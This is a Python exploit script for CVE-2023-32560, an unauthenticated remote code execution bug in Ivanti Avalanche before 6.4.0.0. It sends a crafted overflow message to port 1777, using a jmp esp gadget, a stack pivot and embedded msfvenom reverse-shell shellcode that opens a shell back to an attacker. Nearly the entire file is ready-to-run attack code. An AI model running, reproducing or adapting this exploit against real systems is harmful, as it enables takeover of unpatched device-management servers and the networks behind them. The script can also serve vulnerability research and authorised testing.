""" Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution Date: 2023-08-16 Exploit Author: Robel Campbell (@RobelCampbell) Vendor Homepage: https://www.ivanti.com/ Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/ Version: v6.4.0.0 Tested on: Windows 11 21H2 CVE: CVE-2023-32560 Reference: https://www.tenable.com/security/research/tra-2023-27 """ import socket import struct import sys # Create an item structure for the header and payload class Item: def __init__(self, type_, name, value): self.type = type_ self.name = name.encode() self.value = value self.name_size = 0x5 self.value_size = 0x800 def pack(self): return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size), self.type, self.name_size, self.value_size, self.name, self.value) # Create a header structure class HP: def __init__(self, hdr, payload): self.hdr = hdr self.payload = payload self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16) def pack(self): return b''.join([item.pack() for item in self.hdr]) + \ b''.join([item.pack() for item in self.payload]) + self.pad # Create a preamble structure class Preamble: def __init__(self, hp): self.msg_size = len(hp.pack()) + 16 self.hdr_size = sum([len(item.pack()) for item in hp.hdr]) self.payload_size = sum([len(item.pack()) for item in hp.payload]) self.unk = 0 # Unknown value def pack(self): return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk) # Create a message structure class Msg: def __init__(self, hp): self.pre = Preamble(hp) self.hdrpay = hp def pack(self): return self.pre.pack() + self.hdrpay.pack() # msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 exitfunc=thread -f python shellcode = b"" shellcode += b"fce8820000006089e531c064" shellcode += b"8b50308b520c8b52148b7228" shellcode += b"0fb74a2631ffac3c617c022c" shellcode += b"20c1cf0d01c7e2f252578b52" shellcode += b"108b4a3c8b4c1178e34801d1" shellcode += b"518b592001d38b4918e33a49" shellcode += b"8b348b01d631ffacc1cf0d01" shellcode += b"c738e075f6037df83b7d2475" shellcode += b"e4588b582401d3668b0c4b8b" shellcode += b"581c01d38b048b01d0894424" shellcode += b"245b5b61595a51ffe05f5f5a" shellcode += b"8b12eb8d5d68333200006877" shellcode += b"73325f54684c772607ffd5b8" shellcode += b"9001000029c454506829806b" shellcode += b"00ffd5505050504050405068" shellcode += b"ea0fdfe0ffd5976a0568c0a8" shellcode += b"561e680200115c89e66a1056" shellcode += b"576899a57461ffd585c0740c" shellcode += b"ff4e0875ec68f0b5a256ffd5" shellcode += b"68636d640089e357575731f6" shellcode += b"6a125956e2fd66c744243c01" shellcode += b"018d442410c6004454505656" shellcode += b"5646564e565653566879cc3f" shellcode += b"86ffd589e04e5646ff306808" shellcode += b"871d60ffd5bbe01d2a0a68a6" shellcode += b"95bd9dffd53c067c0a80fbe0" shellcode += b"7505bb4713726f6a0053ffd5" buf = b'90' * 340 buf += b'812b4100' # jmp esp (0x00412b81) buf += b'90909090' buf += b'90909090' buf += shellcode buf += b'41' * 80 buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484) buf += b'43' * (0x800 - len(buf)) buf2 = b'41' * 0x1000 # Create message payload hdr = [Item(3, "pwned", buf)] payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessary hp_instance = HP(hdr, payload) msg_instance = Msg(hp_instance) # Default port port = 1777 # check for target host argument if len(sys.argv) > 1: host = sys.argv[1] else: print("Usage: python3 CVE-2023-32560.py <host ip>") sys.exit() with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((host, port)) s.sendall(msg_instance.pack()) print("Message sent!") s.close()